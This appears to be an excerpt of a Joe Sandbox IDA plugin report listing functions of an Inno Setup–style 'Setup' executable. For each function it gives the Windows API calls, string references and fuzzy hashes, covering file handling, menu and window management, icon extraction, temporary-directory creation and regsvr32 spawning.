Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
String ID:
API String ID: 375863564-0
Opcode ID: 2cd04ac6729f398b558f6f96792d2b908b9b6ab1735444dc408653d80c2f55ab
Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
Opcode Fuzzy Hash: 2cd04ac6729f398b558f6f96792d2b908b9b6ab1735444dc408653d80c2f55ab
Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99

Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
GetFileType.KERNEL32(?,000000F5), ref: 00404C11
CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
GetLastError.KERNEL32(000000F5), ref: 00404C46

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D

Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 00422243
DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Menu$Delete$EnableItem$System
String ID:
API String ID: 3985193851-0
Opcode ID: b9aef185119106b62d1909b50254a2e9e7161919e58d2eca8b004cc57ac8b3b6
Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
Opcode Fuzzy Hash: b9aef185119106b62d1909b50254a2e9e7161919e58d2eca8b004cc57ac8b3b6
Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C

Function 00480000 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 170windowCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 004801A8
FreeLibrary.KERNEL32(?), ref: 004801BC
SendNotifyMessageA.USER32(?,00000496,00002710,00000000), ref: 0048022E

Strings

GetCustomSetupExitCode, xrefs: 0048005D
Restarting Windows., xrefs: 00480209
Deinitializing Setup., xrefs: 0048001E
Not restarting Windows because Setup is being run from the debugger., xrefs: 004801DD
DeinitializeSetup, xrefs: 004800B9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FreeLibrary$MessageNotifySend
String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
API String ID: 3817813901-1884538726
Opcode ID: e7134671bab3b69589cbfd0d73efee35861f5ae008dd0651eb716737997f18ed
Instruction ID: cee3c0feaa82f34ff8ccc77a058218ffec1e5727e3f2c49cfa21192a85072f61
Opcode Fuzzy Hash: e7134671bab3b69589cbfd0d73efee35861f5ae008dd0651eb716737997f18ed
Instruction Fuzzy Hash: BD51A3306142009FD761EB69E949B5E77E4EB19714F6088BBFC04C73A2DB389C49CB99

Function 00466994 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00466A37
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A5D

Part of subcall function 004668D4: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 0046696C
Part of subcall function 004668D4: DestroyCursor.USER32(00000000), ref: 00466982

ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466AB4
SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466B15
ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466B3B

Strings

{H, xrefs: 0046699F
shell32.dll, xrefs: 00466A98
c:\directory, xrefs: 00466A32

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Icon$Extract$FileInfo$CursorDestroyDraw
String ID: c:\directory$shell32.dll${H
API String ID: 3376378930-1386800945
Opcode ID: 1c711776774904a7807d2ce54840a6a38b87bde4f72bd926aa9b508198a860f9
Instruction ID: bb42604bc5e62439ed76953f0acd9fdfc54ee7023d6ada76ef8daf36ea167999
Opcode Fuzzy Hash: 1c711776774904a7807d2ce54840a6a38b87bde4f72bd926aa9b508198a860f9
Instruction Fuzzy Hash: 7B518F70600218AFDB10EF65CD8AFCEB7E8EB48704F1181B6B408E7351D638AE81CB59

Function 0047B794 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 108COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B907,?,?,00000000,0049A628,00000000,00000000,?,00496C01,00000000,00496DAA,?,00000000), ref: 0047B827
GetLastError.KERNEL32(00000000,00000000,00000000,0047B907,?,?,00000000,0049A628,00000000,00000000,?,00496C01,00000000,00496DAA,?,00000000), ref: 0047B830

Strings

Created temporary directory: , xrefs: 0047B7C9
qI, xrefs: 0047B8EC, 0047B85E, 0047B868
REGDLL_EXE, xrefs: 0047B8A4
_isetup, xrefs: 0047B812
\_RegDLL.tmp, xrefs: 0047B894
\_setup64.tmp, xrefs: 0047B8BF

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$qI
API String ID: 1375471231-3882068889
Opcode ID: b0fa32c2117d35af453bfeddefe27d8f29acc292679035a89d7e0f533595db66
Instruction ID: 4382150b65a239bcd865909c49c5e3b79134296aa5f4b8b5b06b090679d32ad3
Opcode Fuzzy Hash: b0fa32c2117d35af453bfeddefe27d8f29acc292679035a89d7e0f533595db66
Instruction Fuzzy Hash: DE414B74A002099FDB01FFA5D882ADEB7B5EF44305F50843BE51477392DB389E058B99

Function 0042F3D4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0042F403
GetFocus.USER32 ref: 0042F40B
RegisterClassA.USER32(004987AC), ref: 0042F42C
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457B52,00000000,0049A628), ref: 0042F4C8

Strings

TWindowDisabler-Window, xrefs: 0042F463, 0042F4A9

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$CreateFocus$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 3167913817-1824977358
Opcode ID: 6e89f19d6d6ac422869fa1ff74290cc51e42ff033bcf4008681222f91d57aef0
Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
Opcode Fuzzy Hash: 6e89f19d6d6ac422869fa1ff74290cc51e42ff033bcf4008681222f91d57aef0
Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

Function 00460EB4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00460EEF
GetActiveWindow.USER32 ref: 00460F53
CoInitialize.OLE32(00000000), ref: 00460F67
SHBrowseForFolder.SHELL32(?), ref: 00460F7E
CoUninitialize.OLE32(00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460F93
SetActiveWindow.USER32(0001041A,00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460FA9
SetActiveWindow.USER32(?,0001041A,00460FBF,00000000,?,?,?,?,?,00000000,00461043), ref: 00460FB2

Strings

A, xrefs: 00460F27

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
String ID: A
API String ID: 2684663990-3554254475
Opcode ID: 73697bf61bfb662cf97866c946a68ef996e92b42bbd051bc0dafbf817f01a1ea
Instruction ID: 2c77ed91a8417aff65a374401c3b3fdadfccc17f1b0de07755fa7fda1c92976a
Opcode Fuzzy Hash: 73697bf61bfb662cf97866c946a68ef996e92b42bbd051bc0dafbf817f01a1ea
Instruction Fuzzy Hash: 98314FB0D00208AFDB14EFA6D885A9EBBF8EB09304F51447AF504E7251E7789A04CB59

Function 00471AFC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000,?,00471E19,?,?,00000000,00472084), ref: 00471B20

Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6

Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496DB9,00000000,00496E0E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63

SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000,?,00471E19), ref: 00471B97
RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471BBD,?,?,?,00000008,00000000,00000000,00000000), ref: 00471B9D

Strings

{0AFACED1-E828-11D1-9187-B532F1E9575D}, xrefs: 00471B59
desktop.ini, xrefs: 00471B34
target.lnk, xrefs: 00471B75
.ShellClassInfo, xrefs: 00471B4F
CLSID2, xrefs: 00471B4A

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
API String ID: 884541143-1710247218
Opcode ID: 1f17ffeb43e41ef723bde022f85523f3d331f44fbe4950413cc1ac320bcef201
Instruction ID: df1969d3b2e75b623ed12d1a57b4041883c9501f119f73ce0aa373245b01fd35
Opcode Fuzzy Hash: 1f17ffeb43e41ef723bde022f85523f3d331f44fbe4950413cc1ac320bcef201
Instruction Fuzzy Hash: FF11E2307005187BD711EA6E8C82B9F73ADDB45714FA0817BB414B72D1EB3CAE02865C

Function 00452860 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 00452880
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 0045289A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004528A0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00452876
Wow64RevertWow64FsRedirection, xrefs: 00452890
shell32.dll, xrefs: 004528CC
kernel32.dll, xrefs: 0045287B, 00452895

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 4b1783f17145704f741ad8f70106bcc07a7389d0363110d01781be23b22a60cf
Instruction ID: 38ce7f80dd5b36a1f2e55088805320c2eb6a0e4d57c6e62c3df02668c3b9852d
Opcode Fuzzy Hash: 4b1783f17145704f741ad8f70106bcc07a7389d0363110d01781be23b22a60cf
Instruction Fuzzy Hash: 470184B0700304AED701ABA29D03B9B3A58E756726F50443BF800A6297D7FC5818CA7D

Function 0045CAD4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,inflateInit_), ref: 0045CADD
GetProcAddress.KERNEL32(?,inflate), ref: 0045CAED
GetProcAddress.KERNEL32(?,inflateEnd), ref: 0045CAFD
GetProcAddress.KERNEL32(?,inflateReset), ref: 0045CB0D

Strings

inflate, xrefs: 0045CAE7
inflateReset, xrefs: 0045CB07
inflateInit_, xrefs: 0045CAD7
inflateEnd, xrefs: 0045CAF7

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc
String ID: inflate$inflateEnd$inflateInit_$inflateReset
API String ID: 190572456-3516654456
Opcode ID: ece32857c94384ee96453ffe71347a4932f128bdb2b5728b0cd1bb2a9bfa23f0
Instruction ID: 525a7e9e0fda6c84af7054bd7e5f3a46cafb7a33014c5953919690b79c8ceac0
Opcode Fuzzy Hash: ece32857c94384ee96453ffe71347a4932f128bdb2b5728b0cd1bb2a9bfa23f0
Instruction Fuzzy Hash: 41012CB0901300DEDB14DF36BECA72736B5E760B96F14903B9C54992A2D778144CCB9C

Function 0041A8EC Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON

Download Yara Rule

APIs

SetBkColor.GDI32(?,00000000), ref: 0041A9C9
73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
SetBkColor.GDI32(?,?), ref: 0041AA18
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
SetBkColor.GDI32(00000000,?), ref: 0041AAD3

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: 76d092ad3213984249078ebe0a84a9e6ce1a1d401503c160032635bc52d3de4f
Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
Opcode Fuzzy Hash: 76d092ad3213984249078ebe0a84a9e6ce1a1d401503c160032635bc52d3de4f
Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68

Function 004573BC Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457570,?, /s ",?,regsvr32.exe",?,00457570), ref: 004574E2

Strings

Spawning 64-bit RegSvr32: , xrefs: 00457447
D, xrefs: 00457498
/u, xrefs: 0045741E
/s ", xrefs: 0045742B
0x%x, xrefs: 00457505
Spawning 32-bit RegSvr32: , xrefs: 00457469
regsvr32.exe", xrefs: 00457403
CreateProcess, xrefs: 004574D4

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseDirectoryHandleSystem
String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
API String ID: 2051275411-1862435767
Opcode ID: 9797d90e45fc908e02a566452e01b4d2decf346c091aad49bb21ed7c478c980a
Instruction ID: c75e28b62514bd1008de2d5da4676738b051ff84ac3b4320ed53282cf2518592
Opcode Fuzzy Hash: 9797d90e45fc908e02a566452e01b4d2decf346c091aad49bb21ed7c478c980a
Instruction Fuzzy Hash: 9F412770E0430C6BDB11EFD5D842B8DB7F9AF45305F50407BA908BB692D7789A098B5D

Function 0044C9CC Relevance: 13.6, APIs: 9, Instructions: 90COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
GetSysColor.USER32(00000014), ref: 0044CA04
SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
GetSysColor.USER32(00000010), ref: 0044CA56
SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 0dde5dfefa80da91ffb1f415c8619ddafc2b78759cb1f1039b07dde114a2dbdb
Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
Opcode Fuzzy Hash: 0dde5dfefa80da91ffb1f415c8619ddafc2b78759cb1f1039b07dde114a2dbdb
Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669

Function 0045327C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 225COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453363

Strings

.tmp, xrefs: 0045331F
MoveFileEx, xrefs: 00453573
NUL, xrefs: 00453425
WININIT.INI, xrefs: 00453311
[rename], xrefs: 004533C6, 00453402
(rI, xrefs: 004535A4, 0045331B, 00453386, 0045331E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID: (rI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]
API String ID: 390214022-1223912792
Opcode ID: 1486bb382fdee591ff84c6003bfc52f2e4e453d080d52ff56523a6b78ea76f58
Instruction ID: c373c87e8fcbee70df1f3a37a90da570fcb7fd3878d7a318cdf2ff94c307cb29
Opcode Fuzzy Hash: 1486bb382fdee591ff84c6003bfc52f2e4e453d080d52ff56523a6b78ea76f58
Instruction Fuzzy Hash: 88912430A00109ABDB11EFA5D842BDEB7B5EF49346F508567F800B7392D778AE098B58

Function 0041B67C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041B755
73A1A570.USER32(?), ref: 0041B761
73A18830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
73A18830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804

Strings

{H, xrefs: 0041B684

Memory Dump Source

